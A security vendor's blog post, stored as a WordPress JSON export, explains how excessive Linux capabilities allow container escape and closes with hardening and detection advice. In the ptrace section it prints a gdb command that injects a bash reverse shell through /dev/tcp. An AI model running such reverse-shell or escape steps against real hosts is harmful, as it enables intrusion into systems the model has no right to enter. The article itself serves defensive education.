{"id":24865,"date":"2023-06-23T15:30:00","date_gmt":"2023-06-23T15:30:00","guid":{"rendered":"https:\/\/nsfocusglobal.com\/?p=24865"},"modified":"2026-04-17T18:07:40","modified_gmt":"2026-04-17T18:07:40","slug":"an-insight-into-rsa-2023-capabilities-utilization-for-container-escape","status":"publish","type":"post","link":"https:\/\/nsfocusglobal.com\/pt-br\/an-insight-into-rsa-2023-capabilities-utilization-for-container-escape\/","title":{"rendered":"An Insight into RSA 2023: Capabilities Utilization for Container Escape"},"content":{"rendered":"<!DOCTYPE html PUBLIC \"-\/\/W3C\/\/DTD HTML 4.0 Transitional\/\/EN\" \"http:\/\/www.w3.org\/TR\/REC-html40\/loose.dtd\">\n<html><body><p>At the RSA Conference this year, researchers from Cyberason shared the topic of Container Escape: All You Need Is Cap (Capabilities), detailing three methods of using Cap permissions for container escape, hoping to make users pay attention to the permission allocation of Capabilities when using containers and maintain best practices. This article will provide a detailed introduction to the technical principles of Capabilities Utilization for container Escape, <a href=\"https:\/\/nsfocusglobal.com\/pt-br\/security-risks-and-threats-of-containerized-infrastructure\/\" target=\"_blank\" rel=\"noreferrer noopener\">one of the security risks and threats of containerized infrastructure.<\/a><\/p>\n\n\n\n<h1 class=\"wp-block-heading\">I. Capabilities Utilization<\/h1>\n\n\n\n<h3 class=\"wp-block-heading\">Introduction to Capabilities<\/h3>\n\n\n\n<p>The Capabilities mechanism was introduced after version 2.2 of the Linux kernel. It is designed to divide and control the root permissions in a more granular way and achieve on-demand authorization. Common Capabilities information can be found on the Linux manual page [1], with some examples shown in Figure 1:<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><a href=\"https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/06\/Figure-22.jpg\"><img fetchpriority=\"high\" decoding=\"async\" width=\"1024\" height=\"576\" src=\"https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/06\/Figure-22-1024x576.jpg\" alt=\"Red circular no entry sign with a white horizontal bar.\" class=\"wp-image-24867\" srcset=\"https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/06\/Figure-22-1024x576.jpg 1024w, https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/06\/Figure-22-300x169.jpg 300w, https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/06\/Figure-22-768x432.jpg 768w, https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/06\/Figure-22-150x85.jpg 150w, https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/06\/Figure-22-600x338.jpg 600w, https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/06\/Figure-22-200x113.jpg 200w, https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/06\/Figure-22.jpg 1080w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/a><\/figure>\n<\/div>\n\n\n<p class=\"has-text-align-center has-small-font-size\">Figure 1 Capabilities Permissions and System Calls<\/p>\n\n\n\n<p>Most Capabilities have atomic capabilities with a limited number of system calls, but there are also some Capabilities with excessively high permissions, such as CAP_ SYS_ ADMIN:<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><a href=\"https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/06\/Figure-23.jpg\"><img decoding=\"async\" width=\"760\" height=\"826\" src=\"https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/06\/Figure-23.jpg\" alt=\"Red circular no entry sign with a white horizontal bar.\" class=\"wp-image-24869\" srcset=\"https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/06\/Figure-23.jpg 760w, https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/06\/Figure-23-276x300.jpg 276w, https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/06\/Figure-23-600x652.jpg 600w, https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/06\/Figure-23-200x217.jpg 200w\" sizes=\"(max-width: 760px) 100vw, 760px\" \/><\/a><\/figure>\n<\/div>\n\n\n<p class=\"has-text-align-center has-small-font-size\">Figure 2 CAP_ SYS_ ADMIN Details<\/p>\n\n\n\n<p>As shown in Figure 2, the official information also indicates the risk of permission &#8220;overload&#8221;, which was analyzed by researchers as early as the article &#8220;CAP_SYS_ADMIN: the new root&#8221; <sup>[2].<\/sup> CAP_ SYS_ ADMIN not only allows the execution of system calls such as mount, umount, and quotacrl, but also includes permissions for other Capabilities, such as CAP_ PERFMON, CAP_ BPF and CAP_ RESTORE_ CHECKPOINT et al.<\/p>\n\n\n\n<h3 class=\"wp-block-heading\"><strong>Capabilities<\/strong> <strong>Discover<\/strong>y<\/h3>\n\n\n\n<p>By default, the Docker container has the Capabilities shown in Figure 3:<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><a href=\"https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/06\/640.png\"><img decoding=\"async\" width=\"994\" height=\"123\" src=\"https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/06\/640.png\" alt=\"Red circular no entry sign with a white horizontal bar.\" class=\"wp-image-24895\" srcset=\"https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/06\/640.png 994w, https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/06\/640-300x37.png 300w, https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/06\/640-768x95.png 768w, https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/06\/640-600x74.png 600w, https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/06\/640-200x25.png 200w\" sizes=\"(max-width: 994px) 100vw, 994px\" \/><\/a><\/figure>\n<\/div>\n\n\n<p class=\"has-text-align-center has-small-font-size\">Figure 3: Default Capabilities in Docker V20.10.7<\/p>\n\n\n\n<p>You can also proactively assign specified Capabilities when starting a container based on business needs, in the following ways:<\/p>\n\n\n\n<p>1) Add specified Capability:<\/p>\n\n\n\n<p>docker run &#8212; cap add=- it<\/p>\n\n\n\n<p>2) Add all Capabilities:<\/p>\n\n\n\n<p>docker run &#8212; cap add=ALL &#8211; it<\/p>\n\n\n\n<p>3) Delete specified Capability:<\/p>\n\n\n\n<p>Docker run &#8212; cap drop=- it<\/p>\n\n\n\n<p>4) Delete all Capabilities:<\/p>\n\n\n\n<p>Docker run &#8212; cap drop=ALL &#8211; it<\/p>\n\n\n\n<p>In Kubernetes, it can be configured through the securityContext field:<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><a href=\"https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/06\/Figure-24-1.jpg\"><img loading=\"lazy\" decoding=\"async\" width=\"677\" height=\"621\" src=\"https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/06\/Figure-24-1.jpg\" alt=\"Red circular no entry sign with a white horizontal bar.\" class=\"wp-image-24873\" srcset=\"https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/06\/Figure-24-1.jpg 677w, https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/06\/Figure-24-1-300x275.jpg 300w, https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/06\/Figure-24-1-600x550.jpg 600w, https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/06\/Figure-24-1-200x183.jpg 200w\" sizes=\"(max-width: 677px) 100vw, 677px\" \/><\/a><\/figure>\n<\/div>\n\n\n<p class=\"has-text-align-center has-small-font-size\">Figure 4 SecurityContext Configuration in Kubernetes<\/p>\n\n\n\n<p>In actual container environment attack and defense scenarios, this permission can be viewed through the cat\/proc\/1\/status command, as shown in Figure 5:<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><a href=\"https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/06\/Figure-25.jpg\"><img loading=\"lazy\" decoding=\"async\" width=\"637\" height=\"230\" src=\"https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/06\/Figure-25.jpg\" alt=\"Red circular no entry sign with a white horizontal bar.\" class=\"wp-image-24875\" srcset=\"https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/06\/Figure-25.jpg 637w, https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/06\/Figure-25-300x108.jpg 300w, https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/06\/Figure-25-600x217.jpg 600w, https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/06\/Figure-25-200x72.jpg 200w\" sizes=\"(max-width: 637px) 100vw, 637px\" \/><\/a><\/figure>\n<\/div>\n\n\n<p class=\"has-text-align-center has-small-font-size\">Figure 5 Capabilities Discovery<\/p>\n\n\n\n<p>The values of Capabilities are displayed in the form of BITMASK. For ease of viewing, it is necessary to use the capsh &#8211;decode=CAP BITMASK command (most container environments do not have the capsh tool installed) for decoding, as shown in Figure 6:<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><a href=\"https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/06\/Figure-26.jpg\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"162\" src=\"https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/06\/Figure-26-1024x162.jpg\" alt=\"Red circular no entry sign with a white horizontal bar.\" class=\"wp-image-24877\" srcset=\"https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/06\/Figure-26-1024x162.jpg 1024w, https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/06\/Figure-26-300x48.jpg 300w, https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/06\/Figure-26-768x122.jpg 768w, https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/06\/Figure-26-600x95.jpg 600w, https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/06\/Figure-26-200x32.jpg 200w, https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/06\/Figure-26.jpg 1080w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/a><\/figure>\n<\/div>\n\n\n<p class=\"has-text-align-center has-small-font-size\">Figure 6 CAP BITMASK Decoding<\/p>\n\n\n\n<h3 class=\"wp-block-heading\"><strong>Utilizing CAP_SYS_ Module for Container Escape<\/strong><\/h3>\n\n\n\n<p>The CAP_ SYS_ MODULE permission allows for the installation and uninstallation of kernel modules, as shown in Figure 7:<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><a href=\"https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/06\/Figure-27.jpg\"><img loading=\"lazy\" decoding=\"async\" width=\"713\" height=\"136\" src=\"https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/06\/Figure-27.jpg\" alt=\"Red circular no entry sign with a white horizontal bar.\" class=\"wp-image-24879\" srcset=\"https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/06\/Figure-27.jpg 713w, https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/06\/Figure-27-300x57.jpg 300w, https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/06\/Figure-27-600x114.jpg 600w, https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/06\/Figure-27-200x38.jpg 200w\" sizes=\"(max-width: 713px) 100vw, 713px\" \/><\/a><\/figure>\n<\/div>\n\n\n<p class=\"has-text-align-center has-small-font-size\">Figure 7 Details of CAP_ SYS_ MODULE<\/p>\n\n\n\n<p>When the container is granted this permission, attackers can install custom modules inside the container. One way is to upload compiled kernel modules, but due to differences between kernel versions, pre-compiled modules may not be universal, but they can be compiled by simulating and targeting the same environment locally; Another way is to directly compile in the target container environment, and the specific usage method can be referred to in &#8220;Abusing CAP_SYS-MODULE to Cause Container Escape&#8221;<sup>[3]<\/sup>. The general principle is shown in Figure 8:<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><a href=\"https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/06\/Figure-28.jpg\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"576\" src=\"https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/06\/Figure-28-1024x576.jpg\" alt=\"Red circular no entry sign with a white horizontal bar.\" class=\"wp-image-24881\" srcset=\"https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/06\/Figure-28-1024x576.jpg 1024w, https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/06\/Figure-28-300x169.jpg 300w, https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/06\/Figure-28-768x432.jpg 768w, https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/06\/Figure-28-150x85.jpg 150w, https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/06\/Figure-28-600x338.jpg 600w, https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/06\/Figure-28-200x113.jpg 200w, https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/06\/Figure-28.jpg 1080w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/a><\/figure>\n<\/div>\n\n\n<p class=\"has-text-align-center has-small-font-size\">Figure 8 Attack process for installing kernel modules<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">Utilizing CAP_ SYS_ PTRACE for Container Escape<\/h3>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><a href=\"https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/06\/Figure-29.jpg\"><img loading=\"lazy\" decoding=\"async\" width=\"646\" height=\"174\" src=\"https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/06\/Figure-29.jpg\" alt=\"Red circular no entry sign with a white horizontal bar.\" class=\"wp-image-24883\" srcset=\"https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/06\/Figure-29.jpg 646w, https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/06\/Figure-29-300x81.jpg 300w, https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/06\/Figure-29-600x162.jpg 600w, https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/06\/Figure-29-200x54.jpg 200w\" sizes=\"(max-width: 646px) 100vw, 646px\" \/><\/a><\/figure>\n<\/div>\n\n\n<p class=\"has-text-align-center has-small-font-size\">Figure 9 Details of CAP_SYS_PTRACE<\/p>\n\n\n\n<p>When a container is assigned a CAP_SYS_PTRACE permission, this permission allows for the use of ptrace system calls.<\/p>\n\n\n\n<p>The ptrace() system call is one of the inter process communication mechanisms provided by Linux systems. Its main function is to allow one process (called a tracer process) to monitor and control another process (called a tracer process). The tracer process can read and write registers and memory of the tracee process, and control the execution of the tracee process, such as single step execution, interrupt execution, etc. The ptrace() system call is typically used to implement debugger tools, such as GDB, for debugging applications, tracking the cause of program crashes, or generating dump files when the application crashes. Ptrace () can also be used to implement Code injection and other advanced debugging techniques. When the container shares the host&#8217;s pid namespace, it can escape the container through process injection.<\/p>\n\n\n\n<p>The following will introduce two methods of using the ptrace() system to call for escape.<\/p>\n\n\n\n<p><strong>1) Process<\/strong> <strong>Debugging<\/strong><\/p>\n\n\n\n<p>The attack principle of process debugging is shown in Figure 10:<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><a href=\"https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/06\/Figure-30.jpg\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"576\" src=\"https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/06\/Figure-30-1024x576.jpg\" alt=\"Red circular no entry sign with a white horizontal bar.\" class=\"wp-image-24885\" srcset=\"https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/06\/Figure-30-1024x576.jpg 1024w, https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/06\/Figure-30-300x169.jpg 300w, https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/06\/Figure-30-768x432.jpg 768w, https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/06\/Figure-30-150x85.jpg 150w, https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/06\/Figure-30-600x338.jpg 600w, https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/06\/Figure-30-200x113.jpg 200w, https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/06\/Figure-30.jpg 1080w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/a><\/figure>\n<\/div>\n\n\n<p class=\"has-text-align-center has-small-font-size\">Figure 10 Using Process Debugging for Container Escape<\/p>\n\n\n\n<p>The prerequisite for the use of this technique:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>CAP_SYS_PTRACE<\/li>\n\n\n\n<li>AppArmor is configured as Unconfined<\/li>\n\n\n\n<li>Shared host pid namespace<\/li>\n<\/ul>\n\n\n\n<p>Query the Process identifier running on the host in the container, and then use the gdb command to debug the command execution:<\/p>\n\n\n\n<p>gdb &#8211; p PID<\/p>\n\n\n\n<p>call (void) system (&#8220;bash &#8211; c&#8217;bash &#8211; i&gt;&amp;\/dev\/tcp\/\/0&gt;&amp;1 &#8216;&#8221;)<\/p>\n\n\n\n<p><strong>2)<\/strong> <strong>Shellcode<\/strong> <strong>injection<\/strong><\/p>\n\n\n\n<p>The attack principle of Shellcode injection is shown in Figure 11:<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><a href=\"https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/06\/Figure-31.jpg\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"576\" src=\"https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/06\/Figure-31-1024x576.jpg\" alt=\"Red circular no entry sign with a white horizontal bar.\" class=\"wp-image-24887\" srcset=\"https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/06\/Figure-31-1024x576.jpg 1024w, https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/06\/Figure-31-300x169.jpg 300w, https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/06\/Figure-31-768x432.jpg 768w, https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/06\/Figure-31-150x85.jpg 150w, https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/06\/Figure-31-600x338.jpg 600w, https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/06\/Figure-31-200x113.jpg 200w, https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/06\/Figure-31.jpg 1080w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/a><\/figure>\n<\/div>\n\n\n<p class=\"has-text-align-center has-small-font-size\">Figure 11 Shellcode injection for escape<\/p>\n\n\n\n<p>The prerequisite for using this technique:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>CAP_SYS_PTRACE<\/li>\n\n\n\n<li>AppArmor is configured as Unconfined<\/li>\n\n\n\n<li>Shared host pid namespace<\/li>\n<\/ul>\n\n\n\n<p>After querying the host Process identifier, execute the injection code<sup>[4]<\/sup>:<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><a href=\"https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/06\/Figure-32.jpg\"><img loading=\"lazy\" decoding=\"async\" width=\"494\" height=\"129\" src=\"https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/06\/Figure-32.jpg\" alt=\"Red circular no entry sign with a white horizontal bar.\" class=\"wp-image-24889\" srcset=\"https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/06\/Figure-32.jpg 494w, https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/06\/Figure-32-300x78.jpg 300w, https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/06\/Figure-32-200x52.jpg 200w\" sizes=\"(max-width: 494px) 100vw, 494px\" \/><\/a><\/figure>\n<\/div>\n\n\n<p class=\"has-text-align-center has-small-font-size\">Figure 12 Shellcode Injection Process<\/p>\n\n\n\n<h1 class=\"wp-block-heading\">II. Defense and Detection<\/h1>\n\n\n\n<p>For containers in real businesses, the allocation of Capabilities is not always strictly restricted. Most open-source applications are often granted higher Capabilities permissions when deployed in a containerized manner, as shown in Figure 13:<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><a href=\"https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/06\/Figure-33.jpg\"><img loading=\"lazy\" decoding=\"async\" width=\"763\" height=\"618\" src=\"https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/06\/Figure-33.jpg\" alt=\"Red circular no entry sign with a white horizontal bar.\" class=\"wp-image-24891\" srcset=\"https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/06\/Figure-33.jpg 763w, https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/06\/Figure-33-300x243.jpg 300w, https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/06\/Figure-33-600x486.jpg 600w, https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/06\/Figure-33-200x162.jpg 200w\" sizes=\"(max-width: 763px) 100vw, 763px\" \/><\/a><\/figure>\n<\/div>\n\n\n<p class=\"has-text-align-center has-small-font-size\">Figure 13 Parameter Details of Container Deployment for Open Source Projects<\/p>\n\n\n\n<p>So, how can an enterprise defend and detect such threats? The following are the best practices and some detection ideas for container use.<\/p>\n\n\n\n<h3 class=\"wp-block-heading\"><strong>Best Practices for Container Usage<\/strong><\/h3>\n\n\n\n<ul class=\"wp-block-list\">\n<li>When creating a container, drop the existing Capabilities first, and then manually add them through the &acirc;&euro;&ldquo; cap-add method to ensure the reasonable use of Capabilities<\/li>\n\n\n\n<li>Try to avoid using privileged containers and avoid using CAP_SYS_ADMIN function.<\/li>\n\n\n\n<li>Running container-based businesses as a non-root user<\/li>\n\n\n\n<li>Configure the AllowPrivilegeEscalation flag to disable privilege escalation<\/li>\n\n\n\n<li>Improve Seccomp policy<sup>[5]<\/sup> to limit the execution of malicious system calls<\/li>\n\n\n\n<li>Improve the AppArmor policy to restrict access to system resources<\/li>\n<\/ul>\n\n\n\n<h3 class=\"wp-block-heading\"><strong>Detection Ideas<\/strong><\/h3>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Monitor container resources running with suspicious or unknown images<\/li>\n\n\n\n<li>Monitor suspicious system calls initiated from within the container, such as init_Module, ptrace, etc<\/li>\n\n\n\n<li>Monitoring suspicious processes generated on containers or hosts<\/li>\n<\/ul>\n\n\n\n<h1 class=\"wp-block-heading\">III. Conclusion<\/h1>\n\n\n\n<p>This article mainly introduces the relevant techniques for container escape using Capabilities permissions. Unlike vulnerability exploitation, the utilization of such insecure configurations is simpler and more practical. The reason is that enterprise users may promptly fix cloud-native infrastructure within the scope of vulnerability impact, upgrade versions, or use patches based on the latest vulnerability notifications when using container environments, but often overlook the risk of improper configuration. Security mechanisms such as Capabilities, Seccomp, and Apparmor require reasonable configuration by humans. However, due to various factors including unskilled staff, lack of security awareness, and lack of practices, it is difficult for humans to achieve best practices during configuration. How to ensure the best practices for secure cloud native environments has become a problem that enterprises need to consider and solve.<\/p>\n\n\n\n<p>NSFOCUS Cloud Native Security Platform (CNSP), based on the CIS Docker Benchmarks<sup>[6]<\/sup> and CIS Kubernetes Benchmarks, has implemented compliance detection capabilities for containers, runtime, orchestration systems, and file orchestration. It can timely identify and consolidate unsafe configurations in the cloud-native environment, helping users build a secure cloud-native environment:<\/p>\n\n\n\n<p>NSFOCUS CNSP also supports security detection capabilities for cloud-native environments, covering behaviors and activities on hosts and containers, including container escape, rebound shells, container authorization, malicious command execution, backdoor deployment, lateral movement, and other types of attack behaviors.<\/p>\n\n\n\n<p>References<\/p>\n\n\n\n<p>[1] https:\/\/man7.org\/linux\/man-pages\/man7\/capabilities.7.html<\/p>\n\n\n\n<p>[2] https:\/\/lwn.net\/Articles\/486306\/<\/p>\n\n\n\n<p>[3] https:\/\/github.com\/Metarget\/metarget\/tree\/master\/writeups_cnv\/config-cap_sys_module-container<\/p>\n\n\n\n<p>[4] https:\/\/github.com\/0x00pf\/0x00sec_code\/blob\/master\/mem_inject\/infect.c<\/p>\n\n\n\n<p>[5] https:\/\/github.com\/moby\/moby\/blob\/master\/profiles\/seccomp\/default.json<\/p>\n\n\n\n<p>[6] https:\/\/www.cisecurity.org\/benchmark\/docker<\/p>\n<\/body><\/html>\n","protected":false},"excerpt":{"rendered":"<p>At the RSA Conference this year, researchers from Cyberason shared the topic of Container Escape: All You Need Is Cap (Capabilities), detailing three methods of using Cap permissions for container escape, hoping to make users pay attention to the permission allocation of Capabilities when using containers and maintain best practices. This article will provide a [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":24900,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_acf_changed":false,"_coblocks_attr":"","_coblocks_dimensions":"","_coblocks_responsive_height":"","_coblocks_accordion_ie_support":"","footnotes":""},"categories":[3],"tags":[152],"class_list":["post-24865","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-blog","tag-container-security"],"acf":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.4 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>An Insight into RSA 2023: Capabilities Utilization for Container Escape - NSFOCUS<\/title>\n<meta name=\"description\" content=\"At the RSA Conference this year, researchers from Cyberason shared the topic of Container Escape: All You Need Is Cap (Capabilities), detailing three methods of using Cap permissions for container escape, hoping to make users pay attention to the permission allocation of Capabilities when using containers and maintain best practices. This article will provide a detailed introduction to the technical principles of this topic.\" \/>\n<meta name=\"robots\" content=\"noindex, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<meta property=\"og:locale\" content=\"pt_BR\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"An Insight into RSA 2023: Capabilities Utilization for Container Escape - NSFOCUS\" \/>\n<meta property=\"og:description\" content=\"At the RSA Conference this year, researchers from Cyberason shared the topic of Container Escape: All You Need Is Cap (Capabilities), detailing three methods of using Cap permissions for container escape, hoping to make users pay attention to the permission allocation of Capabilities when using containers and maintain best practices. This article will provide a detailed introduction to the technical principles of this topic.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/nsfocusglobal.com\/an-insight-into-rsa-2023-capabilities-utilization-for-container-escape\/\" \/>\n<meta property=\"og:site_name\" content=\"NSFOCUS\" \/>\n<meta property=\"article:published_time\" content=\"2023-06-23T15:30:00+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2026-04-17T18:07:40+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/06\/container.png\" \/>\n<meta name=\"author\" content=\"admin\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:title\" content=\"An Insight into RSA 2023: Capabilities Utilization for Container Escape - NSFOCUS\" \/>\n<meta name=\"twitter:description\" content=\"At the RSA Conference this year, researchers from Cyberason shared the topic of Container Escape: All You Need Is Cap (Capabilities), detailing three methods of using Cap permissions for container escape, hoping to make users pay attention to the permission allocation of Capabilities when using containers and maintain best practices. This article will provide a detailed introduction to the technical principles of this topic.\" \/>\n<meta name=\"twitter:image\" content=\"https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/06\/container.png\" \/>\n<meta name=\"twitter:label1\" content=\"Escrito por\" \/>\n\t<meta name=\"twitter:data1\" content=\"admin\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. tempo de leitura\" \/>\n\t<meta name=\"twitter:data2\" content=\"9 minutos\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/nsfocusglobal.com\\\/an-insight-into-rsa-2023-capabilities-utilization-for-container-escape\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/nsfocusglobal.com\\\/an-insight-into-rsa-2023-capabilities-utilization-for-container-escape\\\/\"},\"author\":{\"name\":\"admin\",\"@id\":\"https:\\\/\\\/nsfocusglobal.com\\\/pt-br\\\/#\\\/schema\\\/person\\\/fd9ab61c9c77a81bbd870f725cc0c61d\"},\"headline\":\"An Insight into RSA 2023: Capabilities Utilization for Container Escape\",\"datePublished\":\"2023-06-23T15:30:00+00:00\",\"dateModified\":\"2026-04-17T18:07:40+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/nsfocusglobal.com\\\/an-insight-into-rsa-2023-capabilities-utilization-for-container-escape\\\/\"},\"wordCount\":1298,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/nsfocusglobal.com\\\/pt-br\\\/#organization\"},\"image\":{\"@id\":\"https:\\\/\\\/nsfocusglobal.com\\\/an-insight-into-rsa-2023-capabilities-utilization-for-container-escape\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/nsfocusglobal.com\\\/wp-content\\\/uploads\\\/2023\\\/06\\\/container.png\",\"keywords\":[\"Container 